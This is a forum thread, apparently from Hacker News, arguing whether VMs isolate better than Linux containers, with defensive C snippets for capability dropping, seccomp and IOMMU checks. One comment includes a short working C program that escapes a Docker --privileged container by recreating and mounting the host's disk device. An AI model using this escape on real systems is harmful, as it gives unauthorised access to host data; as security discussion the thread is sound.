
You cannot build a secure virtualization runtime because underlying it is the VMM. Until you have a secure VMM you are subject to precisely the same class of problems plaguing container runtimes.

The only meaningful difference is that Linux containers aim to partition Linux kernel services, a shared-by-default/default-allow environment that was never designed for, and has never achieved, meaningful security. The number of vulnerabilities resulting from "whoopsie, we forgot to partition shared service 123" would be hilarious if it were not a complete lapse of security engineering in a product people are convinced is adequate for security-critical applications.

Present a vulnerability assessment demonstrating that a team of 10 with 3 years' time (~10-30 M$, comparable to many commercially motivated single-victim attacks these days) can find no vulnerabilities in your deployment, or a formal proof of security and correctness. Otherwise we should stick with the default assumption that software is easily hacked, rather than the extraordinary claim that demands extraordinary evidence.



> You cannot build a secure virtualization runtime because underlying it is the VMM

There are VMMs (e.g. pKVM in upstream Linux) with small SLoC counts that are isolated by silicon support for nested virtualization. This ships on recent Google Pixel phones/tablets, providing strong isolation of the untrusted Debian Arm Linux "Terminal" VM.

A similar architecture was shipped a decade ago by Bromium and now runs on millions of HP business laptops, including hypervisor isolation of firmware: "Hypervisor Security: Lessons Learned — Ian Pratt, Bromium — Platform Security Summit 2018", https://www.youtube.com/watch?v=bNVe2y34dnM

Christian Slater, HP cybersecurity ("Wolf") edutainment on nested virt hypervisor in printers, https://www.youtube.com/watch?v=DjMSq3n3Gqs


> silicon support for nested virtualization

Is there any guarantee that this "silicon support" is any safer than the software? Once we break the software abstraction down far enough, it's all just configuring hardware. Conversely, once you start baking significant complexity into hardware (such as strong security boundaries), it would seem that hardware would be subject to exactly the same bugs as software, except that it will be hard to update, of course.


> Is there any guarantee that this "silicon support" is any safer than the software?

Safety and security claims are only meaningful in the context of threat models. As described in the Xen/uXen/AX video and the pKVM and AWS Nitro security talks, one goal is to reduce the size, function and complexity of open-source code running at the highest processor privilege levels [1], minimizing dependency on closed firmware/SMM/TrustZone. Nitro moved some functions (e.g. I/O virtualization) to separate processors, e.g. SmartNIC/DPU. Apple used an Arm T2 secure enclave processor for encryption and some I/O paths when their main processor was still x86. OCP Caliptra RoT requires OSS firmware signed by both the OEM and the hyperscaler customer. It's a never-ending process of reducing attack surface, prioritized by business context.

> hardware would be subject to exactly the same bugs as software would, except it will be hard to update of course

Some "hardware" functions can be updated via microcode, which has been used to mitigate speculative execution vulnerabilities, at the cost of performance.

[1] https://en.wikipedia.org/wiki/Protection_ring

[2] https://en.wikipedia.org/wiki/Transient_execution_CPU_vulner...


While VMs do have an attack surface, it is vastly different from that of containers, which, as you pointed out, are not really a security system but simply namespaces.

Seccomp, capabilities, SELinux, AppArmor, etc. can help harden containers, but most of the popular containers don't even drop root for services, and I was one of the people who tried to get Docker/Moby etc. to let you disable the privileged flag... which they refused to do.
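
For what it's worth, "drop root for services" at the syscall level can be as small as the sketch below, using libcap (link with -lcap). Running it as entrypoint setup is my assumption for illustration, not how any particular image actually does it:

    #include <stdio.h>
    #include <sys/capability.h>   /* libcap */
    #include <sys/prctl.h>

    int main(void) {
        /* Refuse to ever regain privileges via setuid binaries etc. */
        if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) < 0)
            return 1;

        /* cap_init() returns an empty capability state; installing it
           clears the permitted, effective and inheritable sets. */
        cap_t empty = cap_init();
        if (!empty || cap_set_proc(empty) < 0)
            return 1;
        cap_free(empty);

        /* exec the actual service from here */
        puts("all capabilities dropped");
        return 0;
    }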

While some CRIs make this easier, any agent that can spin up a container should be considered a superuser.

With the docker --privileged flag I could read the host's root volume or even install EFI BIOS files, just by using mknod etc. and walking /sys to find the major/minor numbers.
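
The whole attack fits in a few lines of C. A minimal sketch (it assumes the host volume shows up as sda and is directly mountable as ext4; a real attacker would walk /sys/class/block and try partitions like sda1):

    #include <stdio.h>
    #include <sys/mount.h>
    #include <sys/stat.h>
    #include <sys/sysmacros.h>

    int main(void) {
        unsigned int maj, min;
        /* In a --privileged container, /sys is the host's sysfs, so
           the host disk's device numbers are right there. */
        FILE *f = fopen("/sys/class/block/sda/dev", "r");
        if (!f || fscanf(f, "%u:%u", &maj, &min) != 2)
            return 1;
        fclose(f);

        /* Recreate the host's block device node inside the container... */
        if (mknod("/tmp/hostdisk", S_IFBLK | 0600, makedev(maj, min)) < 0)
            return 1;

        /* ...and mount it: the host's root volume is now readable. */
        if (mount("/tmp/hostdisk", "/mnt", "ext4", MS_RDONLY, NULL) < 0)
            return 1;
        return 0;
    }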

Namespaces are useful in a comprehensive security plan, but as you mentioned, they are not jails.

It is true that both VMs and containers have attack surfaces, but the size of the attack surface on containers is much larger.


I see your point but even if your VMM is a zillion lines of C++ with emulated devices there are opportunities to secure it that don't exist with a shared-monolithic-kernel container runtime.

You can create security boundaries around (and even within!) the VMM. You can make it so an escape into the VMM process has only minimal value, by sandboxing the VMM aggressively.
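
For example, the VMM can install a seccomp allowlist before the guest boots, so an escapee can only ask the kernel for a handful of syscalls. A rough sketch with libseccomp (link with -lseccomp); the allowlist here is illustrative and deliberately incomplete, though real VMMs such as Firecracker do ship carefully curated filters:

    #include <seccomp.h>   /* libseccomp */
    #include <stddef.h>

    int install_vmm_sandbox(void) {
        /* Default action: kill the process on any syscall not listed. */
        scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL_PROCESS);
        if (!ctx)
            return -1;

        /* Once the guest is running, the vCPU loop mostly needs
           ioctl (KVM_RUN and friends), reads/writes on event fds,
           futexes and a clean exit. Illustrative, not exhaustive. */
        int allowed[] = { SCMP_SYS(ioctl), SCMP_SYS(read), SCMP_SYS(write),
                          SCMP_SYS(futex), SCMP_SYS(exit_group) };
        for (size_t i = 0; i < sizeof(allowed) / sizeof(allowed[0]); i++)
            if (seccomp_rule_add(ctx, SCMP_ACT_ALLOW, allowed[i], 0) < 0)
                goto fail;

        if (seccomp_load(ctx) < 0)
            goto fail;
        seccomp_release(ctx);
        return 0;
    fail:
        seccomp_release(ctx);
        return -1;
    }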

Plus you can absolutely escape the model of C++ emulating devices. Ideally I think VMMs should do almost nothing but manage VF passthroughs. Of course then we shift a lot of the problem onto the inevitably completely broken device firmware, but again there are more ways to mitigate that than there are for kernel bugs.


Could you elaborate on how you could secure those architectures better? It's unclear to me how being in device firmware or being a VMM provides you with any further abilities. Surely you still have the same fundamental problem of being a shared resource.

Intuitively there are differences. The Linux kernel is fucking huge, and anything that could bake the "shared resources" down to less than the entire kernel would be easier to verify, but that would also be true for an entirely software based abstraction inside the kernel.

In a way it's the whole microkernel discussion again.


When you escape a container generally you can do whatever the kernel can do. There is no further security boundary.

If you escape into a VMM you can do whatever the VMM can do. You can build a system where it cannot do much more than the VM guest itself. By the time the guest boots, the process containing the vCPU threads has already lost all its interesting privileges and has no credentials of value.
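
Concretely, "lost all its interesting privileges" can look something like the sketch below, run before the first vCPU starts (the empty-chroot path and the 65534 uid/gid are illustrative assumptions, not any particular VMM's code):

    #define _GNU_SOURCE
    #include <grp.h>
    #include <unistd.h>

    /* Call after guest memory and fds are set up, before KVM_RUN. */
    static int drop_privileges(void) {
        /* Confine the filesystem view to an empty directory. */
        if (chroot("/var/empty") < 0 || chdir("/") < 0)
            return -1;

        /* Shed supplementary groups, then switch to an unprivileged
           uid/gid (65534 is "nobody" on many distros). After this an
           escape into the VMM process gains no credentials of value. */
        if (setgroups(0, NULL) < 0)
            return -1;
        if (setresgid(65534, 65534, 65534) < 0)
            return -1;
        if (setresuid(65534, 65534, 65534) < 0)
            return -1;
        return 0;
    }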

Similar with device passthrough. It's not very interesting if the device you're passing through ultimately has unchecked access to PCIe, but if you have a proper IOMMU set up, it should be possible to have a system where pwning the device firmware is just a small step rather than an immediate escalation to root-equivalent. (I should say, I don't know if this system actually exists today, I just know it's possible.)
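
One cheap sanity check along those lines: a device that is safe to hand to a guest sits behind the IOMMU, which shows up as an iommu_group link in sysfs (this is what VFIO keys off). A sketch, with the PCI address as a placeholder:

    #include <limits.h>
    #include <stdio.h>
    #include <unistd.h>

    int main(void) {
        char group[PATH_MAX];
        /* Placeholder PCI address: substitute the passthrough device. */
        const char *dev = "/sys/bus/pci/devices/0000:01:00.0/iommu_group";
        ssize_t n = readlink(dev, group, sizeof(group) - 1);
        if (n < 0) {
            puts("no iommu_group: this device's DMA is unconstrained");
            return 1;
        }
        group[n] = '\0';
        printf("device sits in %s; the IOMMU can fence its DMA\n", group);
        return 0;
    }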

With a VMM escape your next step is usually to exploit the kernel. But if you sandbox the VMM properly there is very limited kernel attack surface available to it.

So yeah you're right it's similar to the microkernel discussion. You could develop these properties for a shared-kernel container runtime... By making it a microkernel.

It's just that that isn't a path with any next steps in the real world. The road from Docker to a secure VM platform is rich with reasonable incremental steps forward (virtualization is an essential step, but it's still just one of many). The road from Docker to a microkernel is... rewrite your entire platform and every workload!


> It's just that that isn't a path with any next steps in the real world.

It appears we find ourselves at the Theory/Praxis intersection once again.

> The road from Docker to a secure VM platform is rich with reasonable incremental steps forward

The reason it seems so reasonable is that it's well trodden. There were an infinity of VM platforms before Docker, and they were all discarded for pretty well-known engineering reasons, mostly to do with performance, but also for being difficult for developers to reason about. I have no doubt that there's still dialogue worth having between those two approaches, but cgroups isn't a "failed" VM security boundary any more than Linux is a failed microkernel. It never aimed to be a VM-like security boundary.



